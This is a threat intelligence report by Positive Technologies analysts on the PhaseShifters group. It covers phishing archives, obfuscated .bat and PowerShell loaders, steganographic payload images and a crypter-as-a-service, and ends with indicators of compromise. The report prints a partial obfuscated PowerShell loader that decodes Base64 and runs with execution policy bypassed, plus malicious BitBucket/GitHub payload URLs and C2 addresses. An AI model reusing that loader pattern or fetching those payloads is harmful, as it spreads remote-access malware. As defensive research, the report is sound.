Kids, Don't Copy! The "New" Techniques of the PhaseShifters Group

Authors:

Klimenty Galkin, Junior Specialist, Threat Intelligence Department, PT Expert Security Center
Alexander Badayev, Specialist, Threat Intelligence Department, PT Expert Security Center

Key findings

  • New attacks have been discovered that we have attributed to the PhaseShifters group.
  • The attack uses a well-known steganography technique that replicates attacks from the TA558 group, as described in one of our previous articles.
  • The attackers use one of the Spanish-language crypters described in an article by experts at the company eSentire regarding the Blind Eagle group.
  • The group uses BitBucket and GitHub repositories to store encoded payloads.
  • There is a possibility that all repositories belong to the found service offering a subscription to crypters and obfuscators.
  • It appears that the same repository can be used by multiple groups from all around the world. For example, BitBucket repositories were discovered that were used in attacks on both Russia and Ukraine.
  • The found BitBucket repository again raised the question of the similarity of the PhaseShifters group to another group discovered in 2020.

Introduction

In the process of monitoring attacks on Russian organizations, specialists from the Threat Intelligence department of the Positive Technologies Expert Security Center discovered phishing emails and files addressed to various Russian companies, including state-owned ones. After analyzing the context of the attack, as well as the downloaded malware, we were able to attribute these files to the PhaseShifters group.

PhaseShifters (Sticky Werewolf) are a hacker group that conducts espionage and attacks against various industries in Russia and Belarus, as well as Polish government organizations.

We named the group "PhaseShifters" because, from the moment of its discovery, we noticed a change in techniques that closely followed those of the UAC-0050 group. This is why the name was inspired by "phase shift", which refers to the difference between two quantities that change periodically over time with the same frequency.

In their attacks, the group uses phishing emails—supposedly sent by officials—that contain a request to review a document and sign it. The document is contained as an attachment inside a password-protected archive.

The malware used by the attackers includes Rhadamanthys, DarkTrack RAT, Meta Stealer, and others.

We have been observing a high level of activity from PhaseShifters since spring 2023. From the very beginning of this time, we noticed that practically the same attack patterns were being used as those from the UAC-0050 group, which was discovered in 2020. We are therefore inclined to believe that they may be one and the same group, although this will require further observation to be confirmed.

In the process of searching for similar attacks, dozens of different malicious files were discovered, with subjects such as resumes, supplementary agreements, and so on. These files were sent to various organizations in the industrial sector, as well as to research centers and government agencies.

However, the attack did not use standard techniques for this group, but rather techniques that were obviously and clearly associated with groups from another region: TA558 and Blind Eagle.

In this study, we will present an analysis of the PhaseShifters group's new attack chain, which has been used since at least June 2024, and also highlight its similarities to other hacker groups.

Detected attacks

First files discovered

At the end of June 2024, during the process of researching threats, we discovered an archive called Копия трудовой.docx.rar (Russian for "Work record book copy"). Presumably, the archive was distributed as an attachment in emails to various companies in Russia. The archive was protected with a password, which could presumably be found in the body of the email.

We gained access to a file located in this archive — Копия трудовой.docx.exe SHA-256:
60414E88A21DF60B0CACCDF498B41AA7C75C10D880AB61A620F5B13BA2FAEBD1

The file Копия трудовой.docx.rar uploaded several files to the system, including an executable file with the provocative name putin_***.exe, as well as a decoy document with photographs of the passport of a citizen of the Republic of Belarus.

Decoy document with a passport
Figure 1: Decoy document with a passport

When run, the file with the provocative name launched powershell scripts that, during operation, received images with the malware loader and the payload of the last stage from the BitBucket repositories.

  • https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723
  • https://bitbucket.org/fasf24124/fdgfytrj/downloads/roAScpm.txt

In the case of the first BitBucket, which contained images with steganography, the repository contained the following files:

bitbucket.org/hgdfhdfgd
Figure 2: bitbucket.org/hgdfhdfgd

The person who committed the code to the repository was a certain Nano. This repository is currently inactive, meaning that there is no way to find out this user's email.

Commits from Nano
Figure 3: Commits from Nano

The images depicted the Atacama Desert in Chile.

Malicious image
Figure 4: Malicious image

The second repository, which acted as storage for the final load, is still functioning. According to the metadata, it was originally created on March 4, 2024 by a certain user with the nickname siniy34240.

The first commit to the bitbucket.org/fasf24124 repository
Figure 5: The first commit to the bitbucket.org/fasf24124 repository

At the time of the analysis, this BitBucket contained 46 files with different names, although some of them were identical in content.

Files from the bitbucket.org/fasf24124 repository
Figure 6: Files from the bitbucket.org/fasf24124 repository

This BitBucket was subsequently mentioned by researchers at the OffZone conference.

This chain used Bulgarian C2, which is linked to other similar attacks and files such as:

  • ru***
  • ***pen**
  • vvp_***

These files were also talked about at the aforementioned conference.

Later on, in September 2024, several more documents were discovered that worked in a similar way:

  • Заявление об актуализации персональных данных.rar (f0d402ffd0b57202feadee1a0b831a27a4b8135933cddb3d99232fbb20d3e138) (Russian for “Request to update personal data”)
  • ФГУП «*******» (1ff8d5c5cb7e1949e55b602aad6d7253216a4ac55727703557410d2c47d561b8.bin) (draft supplementary agreement from a Federal State Unitary Enterprise [Russian abbreviation FGUP/ФГУП] with variable name—see example in fig. 7 below) 
  • Проект распоряжения правительства Курской области.pdf.zip (Russian for “Draft order of the local government of Kursk oblast”)
  • Договор.pdf.rar (Russian for “Contract”)
  • etc.
Example of a malicious email
Figure 7: Example of a malicious email
Example of a decoy document
Figure 8: Example of a decoy document

General description of the attacks

A diagram of the attack chain is presented below. The yellow boxes contain additional information, descriptions of obfuscation techniques, links used, and other indicators of compromise. The main attack vector path is shown in red, with an alternative path shown in blue.

Diagram of the attack chain
Figure 9: Diagram of the attack chain

The victim receives an email containing an archive with a password. The archive contains an executable file and a stub document. The password for the archive can be found in the text of the email. Usually, it's a short password consisting only of digits. As soon as the user opens the archive and runs the executable file, the stub opens.

The executable file then downloads a malicious obfuscated .vbs or .bat script into the system. In general, the obfuscation algorithm is as follows (commands from a .bat file are taken as an example):

  1. The entire script is divided into blocks of SET and GOTO commands.
  2. Each of these blocks is labeled with unreadable symbols.
  3. Each of these blocks stores a piece of a powershell script and goes on to set a variable with another part of the script.
  4. The final tag concatenates all the generated blocks
Example of an obfuscated .bat script
Figure 10: Example of an obfuscated .bat script

As a result, string concatenation occurs as follows:

:final_ps_payload %ps_payload_1%%ps_payload_2%%ps_payload_3%%ps_payload_4%%ps_payload_5%%...%%ps_payload_N%


Where final_ps_payload is the final obfuscation tag, ps_payload_N is a part of the powershell script, and N is the number of parts of the powershell script. The names of the tag and variables have been changed for ease of understanding.

The powershell script is then launched, which looks something like this:

$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#...<Line continuation>’; $oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::FromBase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxDutionpolicy bypass -Noprofile -command $OWjuxD"


As can be seen in the script, the # symbol is replaced with another one in order to obtain the correct Base64 string. As it subsequently turned out, there may be more than one symbol: It is possible to replace a block of several symbols, even in Unicode encoding.

The decoding results in another powershell script that looks like this:

The powershell script after Base64 decoding
Figure 11: The powershell script after Base64 decoding

Let's take a look at the script's operating algorithm:

  1. There is a function called "DownloadDataFromLinks", which goes through an array of links and tries to download a file with a .jpg extension.
  2. If any of the links are active and have returned an image, the bytes of the image are written to a variable called $imageBytes.
  3. The file contains two tags, between which the script receives the payload in Base64.
  4. The payload is decoded.
  5. The payload is the Ande Loader, which is prepared for launch via the method [System.Reflection.Assembly]::Load.
  6. The payload is downloaded from C2 and injected into the legitimate process RegAsm using the la method from the downloaded payload.

Having studied the source code of the loader that is injected into the process, we can say that the main purpose of the la method is to call the Ande method, which will in its turn embed the malware through a legitimate process. Another function of the method is to embed the parent script to run on startup or to remain in the system for a certain period of time. The method itself takes five parameters:

  • adress: A string with an inverted link to download the payload;
  • enablestartup: A string that stores a digit from the set {0,1,2}. The value of this parameter determines whether or not the malware will be embedded to run on startup and how it will be implemented if so;
  • startupname: A string with the name of the executable file embedded to run on startup in the event that enablestartup = True;
  • injection:: The name of the process into which the malware code is to be embedded;
  • persistence:: A string parameter that acts as a Boolean value. If persistence = "1″ and enablestartup = "0″, a .bat script is created that, in a cycle of 1000 iterations once per minute, checks for the presence of the injection process among the active processes. If this is not the case, it launches the <startupname >.vbs file, which should then start the entire chain again.

The code for the la method can be seen in the screenshots below.

Method inside the loader for embedding the malware
Figure 12: Method inside the loader for embedding the malware
Condition for the persistence flag
Figure 13: Condition for the persistence flag

The most important things among the parameters—and, in general, the script as a whole—are the links to download the payload. During the investigation of the set of files described above, no other file storage locations were found other than the BitBucket and GitHub repositories. At the time of writing this article, the repository containing the latest payload from the examined attack was no longer available, but there are many other repositories online that contain the encoded payloads. Inside the text files is an inverted Base64 string of bytes from the executable file.

An example of a GitHub repository with an image containing a dropper
Figure 14: An example of a GitHub repository with an image containing a dropper
An example of repository with payloads
Figure 15: An example of repository with payloads

The final payload in the attack chain under examination is a remote access trojan called DarkTrack RAT, which, according to experts, was used by the group in attacks from 2023 and 2024. The majority of recent attacks have been using the same attacker server: 45.143.166[.]100:52336.

In addition to DarkTrack RAT, the repositories contain malware families such as AsyncRAT, Redline, Remcos, njRAT, XWorm, and more. This set of Trojans and stealers is used by several groups, including TA558, Blind Eagle, and others. Moreover, it's interesting to note that some samples have been downloaded over 46,000 times. This number of downloads indicates a mass use of files that is not typical for traditional APTs, but rather for malware distribution services.

A large number of downloads from the malware repository
Figure 16: A large number of downloads from the malware repository

Crypters used: Crypter-As-A-Service

When searching for similar elements in powershell scripts, as well as .bat and .vbs files, we identified several obfuscation features:

  • Obfuscation through the use of SET, GOTO (.bat files) or Call (.vbs) functions.
  • The presence of the $codigo variable in the powershell script obtained after deobfuscation. It's worth noting that "codigo" is the Portuguese and Spanish translation of the word "code".
  • The $codigo variable contains a string with a Base64-encoded powershell script, and, in order for it to be correct, it is necessary to replace one character or sequence of characters with another.
  • The final powershell script downloads the payload, which is a malware loader. In this case, the loader itself is downloaded as a text file, inside of which is a Base64-encoded executable file.

By identifying the features of the scripts, it was possible to find shared aspects with the attacks of the group TA558, as we described in April 2024, as well as with the attacks of Blind Eagle, as described by eSentire in February 2024. The most interesting thing is that the second report talks about the use of crypters and obfuscators that are distributed on shadow forums, in conjunction with the Ande Loader. Having compared this with the attacks of the PhaseShifters group, we came to the same conclusion.

The main function of the Ande Loader
Figure 17.1: The main function of the Ande Loader
A comparison of the function import structure. The first case is from eSentire's article; the second is from the attacks we examined
Figure 17.2: A comparison of the function import structure. The first case is from eSentire's article; the second is from the attacks we examined
A comparison of the function import structure. The first case is from eSentire's article; the second is from the attacks we examined
Figure 17.3: A comparison of the function import structure. The first case is from eSentire's article; the second is from the attacks we examined

However, the question remains open about the obfuscators and crypters used, and why PhaseShifters decided to use these ones in particular. Specialists from eSentire have already conducted an analysis of several crypters that were used by the BlindEagle group: VBS-Crypter, VBS-Crypter Simples, UpCry (UpCrypter), F*ckCrypter.

From the analysis of the tools, several features can be identified:

  • The use of the $codigo variable, which also contains an encoded powershell script.
  • Working with text files that contain a loader in C#.
  • The retrieval of the method from the loader, as well as how it is passed to the payload as an inverted reference argument.

In addition, in some lines of the crypter, you can find the nicknames of the authors who created these utilities:

  • NoDetectOn
  • Pjoao1578
  • MR_AHMED
  • Roda
Example mark left by the creator of VBS-Crypter
Figure 18: Example mark left by the creator of VBS-Crypter
Example mark left by the creators of VBS-Crypter Simples
Figure 19: Example mark left by the creators of VBS-Crypter Simples
Example mark left by the creator of F*ckCrypt, UpCry
Figure 20: Example mark left by the creator of F*ckCrypt, UpCry

We also discovered a BitBucket repository with commits from a user nicknamed Roda that contained encoded loaders from which methods are called, as was the case in our analysis above. The interesting thing about this BitBucket is the number of downloads: Namely, at the time of our investigation, the number of downloads totaled almost a million.

Repository with commits by Roda
Figure 21: Repository with commits by Roda

The obfuscation techniques and generated powershell scripts work in the same way as in the attack we described, with one exception: There is no interaction with the BitBucket or GitHub services to obtain the image. However, the versions of the crypters are quite old, and therefore everything could have changed, including the type of the generated script.

After further research, we discovered a GitHub repository with the name NoDetectOn, which contained images selling subscriptions to obfuscators and crypters.

NoDetectOn repository
Figure 22: NoDetectOn repository
Example image from the repository (NumLock pressed by an attacker)
Figure 23: Example image from the repository (NumLock pressed by an attacker)

Searching the text of one of the images takes us to a site selling these obfuscators, which offers a subscription to obfuscators for VBS and BAT files at two rates: Public and private. The prices start from $100 per month for an obfuscator for just one file type.

The search for the organization selling crypters
Figure 24: The search for the organization selling crypters

This organization also has a GitHub repository that correlates with the name NoDetectOn.

CryptersAndTools profile
Figure 25: CryptersAndTools profile

The ZIP repository consists of several files containing an inverted Base64 string, as well as an image with the title new_image. The contents of the files are as follows:

Image from the repository
Figure 26: Image from the repository
One of the files from the payload
Figure 27: One of the files from the payload

The image that is currently in the repository (or rather, what is depicted in it) has already been encountered by us in attacks by the TA558 group, only the image was located at a different link.

The very first image (July 2023) with a test payload inside
Figure 28: The very first image (July 2023) with a test payload inside
An image from the repository (August 2024); the payload inside is dnlib
Figure 29: An image from the repository (August 2024); the payload inside is dnlib

Therefore, in this investigation, we made the assumption that TA558, Blind Eagle, and now PhaseShifters as well are using a subscription service for obfuscators and crypters. This is due to the use of the same obfuscation structure, the same variable inside the powershell script, a similar form of storing the payload (text files or images with Base64 in them), and the use of the same repositories with the payload (discussed in more detail below).

Moreover, the CaaS (Crypter-as-a-Service) that we discovered is most likely an association of all the developers whose nicknames are listed above.

However, besides this, we found another group that used the same techniques, the same crypter. We assume that PhaseShifters has been copying the techniques of another group.

It's not just the BitBucket that's the same: Similarities with UAC-0050

Some details about UAC-0050

UAC-0050 (UAC-0096) is a hacker group that has been attacking government organizations in Ukraine since 2020–2021, though it has also attacked companies in Poland, Belarus, Moldova, and the Baltic countries as well as companies in Russia. The group's attacks most often use phishing emails in combination with the well-known malware Remcos RAT, Quasar RAT, Meduza Stealer, and Remote Utilities. However, judging by the attacks carried out, their arsenal isn't limited to these tools alone.

In 2023, the group used Remote Utilities in attacks on Polish and Ukrainian organizations; in January 2024, they began to disguise Remote Utilities as the legitimate application CCleaner. In the last attack mentioned, the group used BitBucket. In March 2024, the expert BushidoToken discussed the connection between UAC-0050 and the DaVinci Group.

Indirect similarities. Techniques used

Previously, we mentioned a number of attacks carried out by the group. These used the following:

  • A phishing email with important content (court documents, scanned documents, copies with a bank mark, an evacuation plan, etc.) with an attachment OR containing a link to download a file.
  • The attachments take the form of a decoy document AND/OR an archive that is password-protected.
  • The password is specified in the body of the email or in the name of a text file inside the archive, and consists of N digits.
  • The archive contains a malicious executable file from the previously listed malware.
Phishing email from the PhaseShifters group
Figure 30.1: Phishing email from the PhaseShifters group
Phishing email from the UAC-0050 group
Figure 30.2: Phishing email from the UAC-0050 group

Looking at this set of facts, it's possible to draw a parallel between the PhaseShifters and UAC-0050 groups. The most similar aspects are seen in attacks by PhaseShifters on companies in Belarus with malware that is disguised as an installer for the CCleaner utility and is an SFX archive with obfuscated AutoIt scripts.

AutoIt scripts were used by both groups for about six months, then both groups stopped using them around the same time. An interesting note about these scripts was that only three groups were observed to use the AutoIt loader, namely: PhaseShifters, UAC-0050, and the pro-Palestinian group Handala, leading researchers from Intezer to name this loader the Handala loader.

Just like UAC-0050, PhaseShifters has attacked Polish organizations. The PhaseShifters group, as confirmed by specialists from the company FACCT, did this in February 2024, whereas the UAC-0050 group was attacking Poland in November and December 2023. Based on the similarity of the techniques used during phishing, as well as the disguising of the malware, we can assume that there is a connection between these two groups. It is not yet possible to say whether they are one and the same: More precise facts are needed to determine this.

Precise similarities in current attacks

It turns out that the attack chain under examination, which uses subscription-based crypters and obfuscators, is used not only by PhaseShifters, but also by UAC-0050. Moreover, there's very little time difference between the two groups using this kind of attack chain: PhaseShifters began using a similar chain in June and July 2024, while UAC-0050 also started using it in July 2024. Furthermore, both groups continue to use this attack pattern at present.

Let's look at the relationship diagram that we were able to create based on the detected attacks (Figure 31). In this diagram, white has been used to highlight the UAC-0050 group's use of some of the repositories from the general list, while yellow represents similar links that only pertain to the PhaseShifters group. The analysis of the attack chain is shown in green, with additional information in purple.

Relationships between PhaseShifters and UAC-0050
Figure 31: Relationships between PhaseShifters and UAC-0050

As can be seen in the diagram, some repositories are used by both groups. Even if the interrelation with the image can be explained by the purchase of the same crypter, as mentioned previously, the use of the same payload repository is more difficult to explain. The fact of the matter is that the latest repository containing the malware is specified by the user in obfuscators as a link to the payload. It turns out that both groups specified these links manually.

Example of the old UpCry interface
Figure 32: Example of the old UpCry interface
Example of the CryptersAndTools interface
Figure 33: Example of the CryptersAndTools interface

The report on OffZone also cites an example of the last BitBucket used for the final payload as an argument in favor of the location of the attackers. As it turns out, bitbucket.org/fasf24124 hosted both DarkTrack used by the PhaseShifters group and Amethyst used by the Sapphire Werewolf group.

Now let's take a look at the attacks by the PhaseShifters and UAC-0050 groups that also use the same repository.

https://bitbucket.org/sdgw/sdge/downloads/ (no longer valid)


On the part of the UAC-0050 group, the repository was used in the attack chain file Копія з позначкою банку.vbs (Ukrainian for "Copy with bank mark.vbs") by loading the file https://bitbucket.org/sdgw/sdge/downloads/meduza.txt as a payload, which becomes Meduza Stealer when decoded using Base64.

The PhaseShifters group used this repository in an attack chain with the file Проект распоряжения правительства Курской области.pdf.zip (Russian for "Draft order of the government of Kursk oblast.pdf.zip") The payload was downloaded from the link https://bitbucket.org/sdgw/sdge/downloads/mbFgnhd.txt, which turned out to be DarkTrack RAT, typical malware for them.

Thus, the same repository contained Meduza Stealer, the use of which is prohibited by the rules of the shadow forum for attacks on Russian organizations and Russian users in general, and DarkTrack RAT, which was detected in attacks on the Russian Federation. A news story mentioning these repositories was then released on October 15, 2024. This has resulted in a rather strange situation.

There is a possibility that the newest version of the crypter provides attackers with a subscription interface that allows them to download malware, and the repositories themselves belong to the creators of the crypters. If this is the case, the malware being located in the same repository must be an accident or a coincidence.

It was also interesting to understand what kind of image was located in the repositories during the attack (or was in them at any other point). However, since the https://bitbucket.org/shieldadas/gsdghjj/ repository has now been removed, the information can be found either on sandbox launches or elsewhere, Telegram for example. As it turns out, the messenger has automatic functionality for creating a preview of a file or page accessible via a link. What's more, each of these previews is most likely saved on the messenger servers, meaning that each time the user accesses the link, the preview is first checked on the servers and, if it exists, it is then given to the user. This is how we managed to see the image that was in the repository at some point via the link.

Remote repository
Figure 34: Remote repository
Image from the Telegram preview
Figure 35: Image from the Telegram preview

Other similarities in indicators

At the beginning of January 2024, as mentioned previously, hacker attacks were carried out on Ukrainian organizations with email subjects such as "Запит судових документів". (Ukrainian for "Request for court documents"). This attack has been attributed to the UAC-0050 group. Among the indicators of compromise, one domain was involved: rmssrv[.]ru. This domain is interesting because it was also found in phishing emails from October 2021, though these were targeted at Russian organizations at that time. According to the National Coordinating Center for Computer Incidents (NCCCI), these emails were sent on behalf of the Federal Tax Service of Russia and contained a malicious attachment (password-protected archive).

Moreover, in that same year of 2021, this domain was used in emails targeted at Ukrainian government organizations. The emails were allegedly from the Patrol Police Department of Kyiv.

It's interesting to note that, in its report, the NCCCI has attached an example of the attack and a screenshot of the malicious archive. The archive contained a password, as well as the executable file itself and additional .rar archives marked as "part1" and "part2".

Example email provided by the NCCCI
Figure 36: Example email provided by the NCCCI

UAC-0050 uses the same naming technique; we haven't seen anything like it from other groups thus far.

Example archive of UAC-0050
Figure 37.1: Example archive of UAC-0050
Example archive of UAC-0050
Figure 37.2: Example archive of UAC-0050

We have seen many similar divisions of the archive into parts from the group. For example, in the attack on Moldova.

Example archive of UAC-0050 in a phishing attack on Moldova
Figure 37.3: Example archive of UAC-0050 in a phishing attack on Moldova

In both the examples given, the UAC-0050 group used the Handala loader in the attacks with AutoIt scripts, the similarities of which we previously discussed.

Conclusion on the relationship

We can establish that the PhaseShifters group is copying the techniques of UAC-0050, and we have already observed a tendency that the copying begins after a small interval of a few weeks.

The copying is practically identical, to the extent that we are more inclined to believe that PhaseShifters and UAC-0050 may actually be one group in the capacity of a third party that is attacking both countries.

Conclusions

The PhaseShifters group is continuing to attack Russian organizations from various sectors. In recent attempts, the attack chain contains steganography techniques that have already been used by other groups.

An analysis of the current chain has led us to BitBucket repositories that belong to the creators of Spanish-language crypters or services with subscriptions to special tools, such as CryptersAndTools.

Since PhaseShifters uses images from BitBucket repositories that are shared by other groups, it is impossible to attribute attacks to any specific group for these BitBucket repos in particular. However, two types of repositories were used in the attacks.

Due to the shared repository with the final payload, as well as the similarities in the attack chains examined by our team, the question of shared aspects between UAC-0050 and PhaseShifters was raised again.

That said, a repeated analysis of the groups' attacks showed significant overlaps between them in a variety of aspects, both in the tools and techniques that were used. The only significant difference between the groups is the final malware used, but this point is negligible.

At present, we are inclined to believe that the PhaseShifters and UAC-0050 are one and the same group. However, further research is needed to confirm this, since it is also possible that PhaseShifters is simply copying UAC-0050's attack chain.

Indicators of compromise

File indicators

File nameMD5SHA-1SHA-256
Договор АО-***-******-№-12904ДО.pdf.exeb388dc8131fd81f81576fb3c1ec2e891759036faa3e742fb30bf7d35c9b991fcba2def2e8eadd27519eb9a97959c7417696f906ce4de01e49e1321a466a2748e888db2a5
Дополнительное соглашени.pdf.exe2e8a9103a92a2b897692ce24c88d530ca9cc98ca9f454f18c20777fce5cb91868925d4d7f75d1d3c22ad03094098e20f73b01ea1d112b76ca52c3d0946f24d5c5d272951
Об авиаинциденте.pdf.exe159dd6c962c8c15bab8e1cabf28eea87a7e2ea509f3d24ed9e8148bcd0c4ca71c4401ee652ca602680b3599d7f62bd33e9846d9092b5016bda77465cad6cfb46bca1af7b
Договор.pdf.exed69165cfd5e6da160c2a60bad8a9daff466caab305aace6234238a45b5dad9d6c0f182ff5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f
Предписание ****.pdf.exe5e3147137a49b00a102d5538d05077a39567a69801e8fcc647cea2a4ba53228b2f64a93603beaec07cf5b4a818406819145591b393ebd1f353c00ba6b4ec7d9d2bb77c39
se16.txt33fe8d665d1df9b4fe716e30ab88253db9b687aeb4b21b67db2a948c69cd9cc6e79273344b5e68c6b34253a92926a3704b8c5a52d8384f5d1688dbed552e3ec99bdd3e0a
server.txt408c7ca69f1a25e43fb724635330fe34c2e1b175c7fa938c15910c218b332d3188e0fdafe6291596fc62e6589037fe1b9188692260877ad627280d620e571b0779778c1a
serv.bat6c9f4e20674c9d8612e2f3820d32f49d8ac178d78178155d9d6a81e525352edfe94968044c54d42f09f4a412c91927eafa7f4899dda996c5b5b3929d0a33b696c6cbeedf
Перечень комплектующих.pdf.exe78128c6a00bb58fdc1228cc6c856288fb927e1be735c9670ea7a4cca3b6c3f5d16b4e59fe025dfc5c8a1057e1e9fa1df385ee396a1d480a7ff02fd01c74ff40c8f372bbf
Резюме.docx.exe55f793b97e0bf8258ae9896b10b57dde34fa113e508e354d43e2f5e7613fabca43213d83d6132f3c8b4c46a53c3e68b08a4e26985bdb66638dcc812f57f5444a33532fbd
Лагеря.exeb1a3dfa9ba32eb0400c16294b4285e8c9cbbb25e1e57c7df9ec571b471364efd8b9980f0043f8a226b2cd4f81279f736ec3c65105b212ff4e71d89d540a62a7e41aedbf3
Копия трудовой.docx.exe
Гособоронзаказ.docx.exe
6a5cb8007261d0ef578c02de549e5b6ff14a1505471dd77efc07cfcfd4e5248fce09d49560414e88a21df60b0caccdf498b41aa7c75c10d880ab61a620f5b13ba2faebd1
putin_h**lo.exedf5671afa8a8170a515c589e1b342d52ae327ecd6f312f5860fe35bacfa36cb9768852bb6e9d23e7b4a677651ccb362fa6833ca13deef184a45a801cb1d7d1f542210809
roAScpm.txt80e1ffa2c3c8b031c19fdb2eb061de12aa77562cf918b7d6847b6743e0f78c18ae4ddc58a53f6d7e18e3544c40874330bc1af7b6600f4460d34417b0b0a444b49c0f267a
список с карточкой 010724.zip7e6cf0a3df371233b9be778aa6e28fb7ab2773616e3e6207d3b8638a5f0e99e8a1f965ad56d32ca1ba0042b4537bd7559b665d24785bf28586bef5901ea90b606c40d039
dts.batac016863ff9cb26ddc1173da42a442d13fb4058642619f1dc90febe9794742ef172975d2330d3eee12c2d4c05abdac1cd9fbcb88b6f2f257b7f12f06332b9e63ce3b51e7
Копия трудовой.docx.zipf02f33c5b8d664ac44c17c1f564cb3d2c10f20b2c74c53a838cfcd2b290cc528456f6c7113fdbbe873978c9c46188ddf6b2f650e842ed69f76ebd6fc5242e4f144b882f1
Трудовая книга.docx.exe55a505b3a045610c58e1812790dff7db370436540a97bffb1207b55cc2839ba67b4efe052fb19586318b7dfd7bbacca8bc49682ce2ac842d72f70348715b12a7e2d9e189

Network indicators

IndicatorIndicator typePurpose
https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?\d+General. The image from the repository is used in attacks by several groupsA GitHub repository with an image that contains the payload
https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?\d+General. The image from the repository is used in attacks by several groupsA BitBucket repository with an image that contains the payload with Ande Loader
https://bitbucket.org/gopal4/start/downloads/new_image?\d+General. The image from the repository is used in attacks by several groupsA BitBucket repository with an image that contains the payload with Ande Loader
https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?\d+General. The image from the repository is used in attacks by several groupsA BitBucket repository with an image that contains the payload with Ande Loader
https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?\d+General. The image from the repository is used in attacks by several groupsA BitBucket repository with an image that contains the payload with Ande Loader
https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?\d+General. The image from the repository is used in attacks by several groupsA BitBucket repository with an image that contains the payload with Ande Loader
https://bitbucket.org/rulmerurk/ertertqw/downloads/.*\.txtIndividual indicator for PhaseShiftersA BitBucket repository with an encoded malicious payload
https://bitbucket.org/fasf24124/fdgfytrj/downloads/.*\.txtIndividual indicator for PhaseShiftersA BitBucket repository with an encoded malicious payload
https://bitbucket.org/fwfsfw/fwf/downloads/.*\.txtGeneral indicator. The repository is used by several groups around the world.A BitBucket repository with an encoded malicious payload
https://bitbucket.org/rfd344/erd/downloads/.*\.txtGeneral indicator. The repository is used by several groups around the world.A BitBucket repository with an encoded malicious payload
https://bitbucket.org/sdgw/sdge/downloads/.*\.txtGeneral indicator. The repository is used by several groups around the world.A BitBucket repository with an encoded malicious payload
45.143.166.100Individual. Only used by the PhaseShifters groupDarkTrack C2
94.156.79.57DarkTrack C2

The MITRE matrix

Reconnaissance
T1135Network Share DiscoveryThe PhaseShifters group scanned network folders accessible via the SMB protocol
Resource Development
T1588.001Obtain Capabilities: MalwareThe PhaseShifters group allegedly purchased a crypter or a subscription to a crypter
T1608.001Stage Capabilities: Upload MalwareThe PhaseShifters group uploaded malware to BitBucket by themselves or via third parties
Initial Access
T1566.001Phishing: Spearphishing AttachmentThe PhaseShifters group sent phishing emails to various companies and attached the requested archives with a password, which was in the body of the email
Execution
T1059.001Command and Scripting Interpreter: PowerShellThe PhaseShifters group launched obfuscated scripts using powershell
T1059.003Command and Scripting Interpreter: Windows Command ShellThe PhaseShifters group launched obfuscated files using cmd.exe
T1059.005Command and Scripting Interpreter: Visual BasicThe PhaseShifters group used obfuscated VB scripts
Persistence
T1547.001Boot or Logon Autostart Execution: Registry Run Keys / Startup FolderThe PhaseShifters group's malicious files were embedded in the Startup folder
Defense Evasion
T1027Obfuscated Files or InformationThe PhaseShifters group used Base64 to encrypt the payload
T1027.002Obfuscated Files or Information: Software PackingThe PhaseShifters group used UPX and Themida
T1027.003Obfuscated Files or Information: SteganographyThe PhaseShifters group used steganography techniques in images located on BitBucket
T1027.010Obfuscated Files or Information: Command ObfuscationThe PhaseShifters group used a crypter that obfuscated powershell code
T1036MasqueradingThe PhaseShifters group disguised .exe files using icons of legitimate programs and other extensions
T1036.007Masquerading: Double File ExtensionThe PhaseShifters group disguised .exe, .docx or .lnk files using double extensions (e.g. .docx.exe)
T1036.008Masquerading: Masquerade File TypeOn the BitBucket repository used by PhaseShifters, malicious files were stored in encoded form with the extension .txt
T1140Deobfuscate/Decode Files or InformationThe PhaseShifters group's malware decoded the payload received during the infection process
T1564.003Hide Artifacts: Hidden WindowThe crypter used by the PhaseShifters group used the -hidden flag to conceal the execution of the powershell script
Discovery
T1057Process DiscoveryThe PhaseShifters group used powershell commands to search for and complete certain processes
T1012Query RegistryThe PhaseShifters group collected information on the registry
Command And Control
T1102Web ServiceThe PhaseShifters group used BitBucket and GitHub to download the malware
T1105Ingress Tool TransferThe PhaseShifters group used Ande Loader to download additional malware
T1571Non-Standard PortThe PhaseShifters group used non-standard ports in the attacks, e.g. 1443 and 49162, for communication via TCP protocol
T1132.001Data Encoding: Standard EncodingThe PhaseShifters group used the standard protocol TLS 1.2 as well as Base64-encoded strings for the encryption of transmitted data

Verdicts by Positive Technologies products

PT SIEM

Double_File_Extension_Masquerading
Suspicious_Directory_For_Process
Suspicious_Connection
Script_Files_Execution
Suspicious_process_execution_sequence
Execute_Malicious_Command
Malicious_Office_Document

PT Sandbox

Backdoor.Win32.Generic.n
tool_mem_ZZ_HeavensGate
Trojan-Downloader.PowerShell.Generic.b
Trojan-Downloader.Win32.Generic.n
Trojan-Downloader.Win32.Ozone.n
Trojan-Dropper.PowerShell.LOLBinStage.a
Trojan-Dropper.Win32.LOLBin.a
Trojan-Spy.Win32.Generic.d
Trojan.PowerShell.Generic.a
Trojan.PowerShell.PSLiner.b
Trojan.Script.Generic.a
Trojan.Win32.Generic.a
Trojan.Win32.Generic.g
Trojan.Win32.Inject.a
Win64.Injected.Heur
Backdoor.Win32.Generic.n

PT NAD

REMOTE [PTsecurity] DarkTrack sid: 10000144, 10000431
REMOTE [PTsecurity] DarkTrack Successful Connection sid: 11003005
POLICY [PTsecurity] Access to a file sharing service (github) sid: 10010210
POLICY [PTsecurity] Access to a file sharing service (bitbucket.org) sid: 10010211
ET MALWARE NetWire / Ozone / Darktrack Alien RAT — Client KeepAlive sid: 2021978
Share this article:

Get in touch

Fill in the form and our specialists
will contact you shortly